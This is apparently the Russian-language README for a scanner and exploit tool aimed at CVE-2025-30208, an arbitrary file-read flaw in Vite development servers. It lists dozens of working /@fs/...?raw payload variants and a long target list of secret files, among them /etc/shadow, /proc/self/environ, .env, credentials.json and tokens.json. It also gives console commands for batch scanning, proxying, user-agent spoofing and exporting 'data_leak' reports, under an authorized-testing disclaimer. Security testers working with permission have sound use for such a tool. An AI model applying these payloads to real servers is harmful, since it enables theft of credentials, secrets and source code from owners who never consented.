
CVE‑2025‑30208 — это уязвимость средней степени тяжести, допускающая произвольное чтение файлов на сервере разработки Vite (популярный инструмент сборки фронтенда).
Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня
Профессиональный инструмент тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов в Vite
🚀 Быстрый старт • 📋 Возможности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность
Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 в серверах разработки Vite. Уязвимость позволяет осуществлять произвольное чтение файлов через конечные точки файловой системы Vite, что потенциально открывает доступ к конфиденциальным файлам конфигурации, исходному коду и системной информации.
Теперь инструмент имеет модульную архитектуру для улучшения сопровождаемости и расширяемости:
CVE-2025-30208.py — основное приложение сканераpayloads.py — продвинутые эксплойт-пейлоады (60+ вариаций)sensitive_files.py — обширная база конфиденциальных файлов (200+ файлов)html_template.py — улучшенный HTML-шаблон отчётов в хакерском стилеpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
Сканер теперь использует 60+ различных вариаций пейлоадов, организованных в payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
Инструмент теперь проверяет 200+ конфиденциальных файлов, организованных в sensitive_files.py:
/etc/passwd — информация об учётных записях пользователей/etc/shadow — зашифрованные данные паролей/etc/services — сетевые службы/etc/hosts — сопоставление имён хостов/etc/fstab — таблица файловых систем/etc/ssh/sshd_config — конфигурация SSH-сервера/etc/crontab — системные задачи cron/etc/sudoers — конфигурация sudo/proc/version — версия ядра/proc/cpuinfo — информация о процессоре/proc/meminfo — информация о памяти/proc/self/environ — окружение процесса/proc/self/cmdline — командная строка процесса/proc/net/tcp — TCP-соединения/proc/net/udp — UDP-соединения.env — переменные окружения.env.local — локальное окружение.env.production — производственное окружениеconfig.json — конфигурация приложенияsettings.json — настройки приложенияapplication.properties — конфигурация Springapplication.yml — YAML-конфигурацияdatabase.yml — конфигурация базы данныхsecrets.json — управление секретамиpackage.json — зависимости Node.jspackage-lock.json — зафиксированные зависимостиyarn.lock — файл блокировки Yarnvite.config.js — конфигурация Vitevite.config.ts — TypeScript-конфигурация Vitetsconfig.json — конфигурация TypeScriptwebpack.config.js — конфигурация Webpacknext.config.js — конфигурация Next.jsnuxt.config.js — конфигурация Nuxt.jsangular.json — конфигурация Angularvue.config.js — конфигурация Vue.jsrollup.config.js — конфигурация Rollupeslint.config.js — конфигурация ESLint.git/config — конфигурация Git.gitignore — правила игнорирования Git.gitattributes — атрибуты Git.gitmodules — подмодули Git.git/HEAD — текущая ветка.git/logs/HEAD — журналы Git.git/refs/heads/master — ветка master.git/refs/heads/main — ветка mainREADME.md — документация проектаCHANGELOG.md — журнал измененийLICENSE — информация о лицензииCONTRIBUTING.md — руководство по участиюAUTHORS — информация об авторахTODO.md — список задачROADMAP.md — дорожная карта разработкиDockerfile — конфигурация Dockerdocker-compose.yml — Docker Composedocker-compose.override.yml — конфигурация переопределения.dockerignore — правила игнорирования Dockerdocker-compose.prod.yml — производственная конфигурацияdocker-compose.dev.yml — конфигурация разработкиnginx.conf — конфигурация Nginxapache2.conf — конфигурация Apachehttpd.conf — конфигурация HTTP-демона.htaccess — контроль доступа Apacheweb.config — конфигурация IISrobots.txt — директивы для поисковых системsitemap.xml — структура сайтаmanifest.json — манифест веб-приложенияsw.js — сервис-воркерfirebase.json — конфигурация Firebasefirebase.rules — правила безопасности Firebaseboot.ini — конфигурация загрузкиautoexec.bat — сценарий автозапускаsystem.ini — системная конфигурацияwin.ini — конфигурация WindowsUsers — пользовательские каталогиWindows — системные файлыProgram Files — каталоги приложенийSystem — системные файлыLibrary — файлы библиотекApplications — файлы приложенийprivate/etc/hosts — файл hostsprivate/etc/passwd — учётные записи пользователейdatabase.db — база данных SQLitedatabase.sqlite — база данных SQLitedata.db — база данныхdump.sql — дамп базы данныхschema.sql — схема базы данныхmigrations — миграции базы данныхlogs — каталог журналовerror.log — журналы ошибокaccess.log — журналы доступаapp.log — журналы приложенияdebug.log — отладочные журналыcombined.log — объединённые журналыbackup — каталог резервных копийbackup.sql — резервная копия базы данныхbackup.zip — сжатая резервная копияdump — дамп данныхexport — экспорт данныхauth.json — конфигурация аутентификацииcredentials.json — хранилище учётных данныхkeys.json — управление ключамиtokens.json — хранилище токеновjwt.json — конфигурация JWToauth.json — конфигурация OAuthapi.json — конфигурация APIswagger.json — документация APIopenapi.json — спецификация OpenAPIgraphql.json — конфигурация GraphQLschema.json — схема APIcloudformation.yml — AWS CloudFormationserverless.yml — serverless-конфигурацияterraform.tf — конфигурация Terraformkubernetes.yml — конфигурация Kubernetesk8s.yml — конфигурация Kubernetesanalytics.json — конфигурация аналитикиmonitoring.json — настройка мониторингаmetrics.json — конфигурация метрикtelemetry.json — данные телеметрииИнструмент теперь генерирует красивые HTML-отчёты в хакерском стиле со следующими возможностями:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Main scanner application
├── payloads.py # Advanced exploitation payloads (60+)
├── sensitive_files.py # Sensitive file database (200+)
├── html_template.py # Enhanced HTML reporting template
├── README.md # This documentation
├── requirements.txt # Python dependencies
├── logs/ # Log files directory
├── data_leak.html # Generated HTML reports
├── data_leak.json # Generated JSON reports
└── session.json # Saved session configurations
Мы приветствуем вклад в улучшение этого инструмента:
payloads.pysensitive_files.pyhtml_template.pyЭтот проект лицензирован только для образовательных целей и авторизованного тестирования безопасности.
⚠️ Правовое предупреждение: Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за любое неправомерное использование этого инструмента.
⭐ Если этот инструмент вам помог, пожалуйста, поставьте ему звезду! ⭐
Создано с ❤️ для сообщества специалистов по безопасности
| Команда | Описание | Пример |
|---|
set <option> <value> | Установить параметры конфигурации | set RHOST 192.168.1.100 |
show options | Показать текущие настройки | show options |
edit | Интерактивный редактор параметров | edit |
run / exploit | Запустить тест на уязвимость | run |
batch | Пакетное сканирование нескольких целей | batch |
scan | Поиск конфиденциальных файлов | scan |
pull | Экспортировать результаты в HTML/JSON | pull |
web [on|off|port] | Веб-сервер для HTML-отчётов | web 8080 |
save | Сохранить конфигурацию сеанса | save |
load | Загрузить конфигурацию сеанса | load |
test | Проверить связь с целью | test |
validate | Проверить текущую конфигурацию | validate |
verbose | Переключить подробный режим | verbose |
proxy | Настроить параметры прокси | proxy |
headers | Установить пользовательские HTTP-заголовки | headers |
rate | Настроить ограничение скорости | rate |
log | Показать информацию журнала | log |
help / ? | Показать справку | help |
exit / quit | Выйти из инструмента | exit |
| Параметр | Описание | По умолчанию | Проверка |
|---|
RHOST | Целевой хост / IP-адрес | - | Проверка имени хоста / IP |
RPORT | Номер порта цели | - | Диапазон портов (1-65535) |
FILEPATH | Путь к файлу для проверки | etc/passwd | Проверка пути |
PROXY | URL HTTP/HTTPS-прокси | - | Проверка формата URL |
VERBOSE | Включить подробный вывод | false | Проверка логического значения |
RATE_LIMIT | Задержка между запросами (секунды) | 0.3 | Числовая проверка |
THREADS | Количество потоков для пакетного сканирования | 5 | Проверка целочисленного значения |
TIMEOUT | Тайм-аут запроса (секунды) | 5 | Проверка целочисленного значения |
CUSTOM_HEADERS | Пользовательские HTTP-заголовки (JSON) | {} | Проверка формата JSON |
prettier.config.js — конфигурация Prettierjest.config.js — конфигурация Jestbabel.config.js — конфигурация Babeltailwind.config.js — конфигурация Tailwind CSS| Файл | Описание | Формат |
|---|
data_leak.html | Улучшенный HTML-отчёт об уязвимости в хакерском стиле | HTML |
data_leak.json | Структурированный экспорт в JSON | JSON |
sensitive_files_discovery.json | Обнаруженные конфиденциальные файлы | JSON |
session.json | Сохранённая конфигурация сеанса | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Подробные журналы аудита | Текст |